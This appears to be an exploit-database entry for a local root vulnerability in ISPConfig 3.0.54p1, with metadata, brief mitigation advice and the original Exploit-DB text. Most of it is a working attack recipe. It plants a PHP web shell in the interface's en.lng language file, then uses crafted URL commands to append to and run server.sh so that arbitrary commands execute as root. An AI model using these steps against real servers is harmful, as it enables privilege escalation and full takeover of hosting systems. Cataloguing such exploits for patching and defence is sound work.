header-logo
Suggest Exploit
vendor:
ISPConfig
by:
mra
7,5
CVSS
HIGH
Localroot vulnerability
264
CWE
Product Name: ISPConfig
Affected Version From: 3.0.54p1
Affected Version To: 3.0.54p1
Patch Exists: NO
Related CWE: N/A
CPE: a:ispconfig:ispconfig
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu, CentOS
2014

ISPConfig 3 authenticated admin Localroot vulnerability

While logged in as admin user, add a shell user and set gid to ispconfig. Log in as that user and edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']). Browse to http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh to create /tmp/script and put a command you wish to be executed as root. Browse to http://server:8080/index.php?cmd=chmod +x /usr/local/ispconfig/server/server.sh and http://server:8080/index.php?cmd=/usr/local/ispconfig/server/server.sh to execute the command as root.

Mitigation:

Ensure that the ISPConfig admin user is not able to add shell users with elevated privileges. Ensure that the /usr/local/ispconfig/interface/lib/lang/en.lng file is not writable by the admin user.
Source

Exploit-DB raw data:

# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
# Date: 7/25/14
# Exploit Author: mra
# Vendor Homepage: http://wwwispconfig.org
# Version: 3.0.54p1
# Tested on: ubuntu, centos
# irc.criten.net #elite-chat


While logged in as admin user:


1) add a shell user

2) under option set gid to ispconfig

3) log in as that user

4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);


5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh


6) create /tmp/script and put a command you wish to be executed as root.

Navigation

Suggest Exploit

Services By CQR